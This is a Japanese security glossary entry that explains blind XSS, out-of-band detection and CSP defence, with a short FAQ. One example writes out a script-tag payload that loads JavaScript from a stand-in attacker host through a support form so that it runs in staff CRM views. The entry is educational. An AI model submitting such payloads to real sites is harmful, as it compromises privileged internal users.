Entry № 122
ブラインド XSS
ブラインド XSS とは何ですか?
ブラインド XSS格納型 XSS の一種で、ペイロードが攻撃者から直接見えないコンテキスト(社内管理画面など)で発火するもの。
ブラインド XSS は格納型 XSS の派生形で、悪意あるスクリプトは攻撃者のブラウザではなく、サポートチケット表示画面、不正検知コンソール、社内ダッシュボード、バックアップレポートなど、別の(多くは特権的な)コンテキストで実行されます。攻撃者は問い合わせフォーム・登録・サポート依頼などの公開フォームからペイロードを送信し、内部ユーザがその保存データを表示するのを待ちます。検知にはアウトオブバンドのコールバックが用いられ、ペイロードは XSS Hunter、Burp Collaborator、自前の DNS/HTTP サーバへ情報を送出してスクリプトの実行場所を明らかにします。防御は格納型 XSS と同様で、管理ツールには厳格な CSP の適用が推奨されます。
● 例
- 01
サポートフォームの入力欄に <script src=https://x.attacker/x.js></script> を含め、エージェントの CRM で発火させる。
- 02
管理ログ閲覧画面に取り込まれた User-Agent ヘッダーが HTML エスケープされずに実行される。
● よくある質問
ブラインド XSS とは何ですか?
格納型 XSS の一種で、ペイロードが攻撃者から直接見えないコンテキスト(社内管理画面など)で発火するもの。 サイバーセキュリティの 攻撃と脅威 カテゴリに属します。
ブラインド XSS とはどういう意味ですか?
格納型 XSS の一種で、ペイロードが攻撃者から直接見えないコンテキスト(社内管理画面など)で発火するもの。
ブラインド XSS からどのように防御しますか?
ブラインド XSS に対する防御は通常、上記の定義で述べたとおり、技術的統制と運用上の実践を組み合わせます。
ブラインド XSS の別名は何ですか?
一般的な別名: アウトオブバンド XSS。